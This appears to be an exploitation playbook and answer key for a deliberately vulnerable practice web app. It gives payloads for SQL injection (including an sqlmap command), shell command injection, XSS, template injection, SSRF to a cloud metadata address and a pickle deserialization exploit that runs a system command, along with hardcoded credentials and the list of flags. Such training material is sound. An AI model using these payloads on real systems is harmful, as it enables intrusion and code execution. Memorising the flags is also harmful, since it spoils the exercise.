VulnApp Playbook

1. Weak Authentication (/login)

Hardcoded credentials: admin / adminpass

POST /login
username=admin
password=adminpass

2. SQL Injection (/user?id=)

Unsanitized SQL string construction.

?id=1 OR 1=1
?id=1 UNION SELECT 1, sqlite_version(), 3

sqlmap -u "http://localhost:5000/user?id=1" --batch --risk=3 --level=5

3. Command Injection (/ping?host=)

Unescaped shell execution.

?host=127.0.0.1; ls
?host=127.0.0.1 && whoami

4. Cross-Site Scripting (XSS) (/comment)

User input rendered without sanitization.

<script>alert('XSS')</script>

5. Server-Side Template Injection (SSTI) (/render)

{{7*7}} => 49
{{config.items()}}

6. Server-Side Request Forgery (SSRF) (/fetch)

URL fetch with no validation.

?url=http://127.0.0.1:5000
?url=http://169.254.169.254/latest/meta-data/

7. Insecure Deserialization (/upload)

Loads uploaded pickled file directly.

import pickle, os
class Exploit:
    def __reduce__(self):
        return (os.system, ('touch /tmp/pwned',))
pickle.dump(Exploit(), open("exploit.pkl", "wb"))

8. Flag Submission (/flags)

Submit flags discovered through exploitation.

flag_roosevelt
flag_truman
flag_kennedy
flag_nixon
flag_ford
flag_reagan
flag_clinton

9. Hidden Routes

Route	Discovery Method
/secret_admin	SSRF or forced browsing
.hidden_assets/robots.txt	URL probing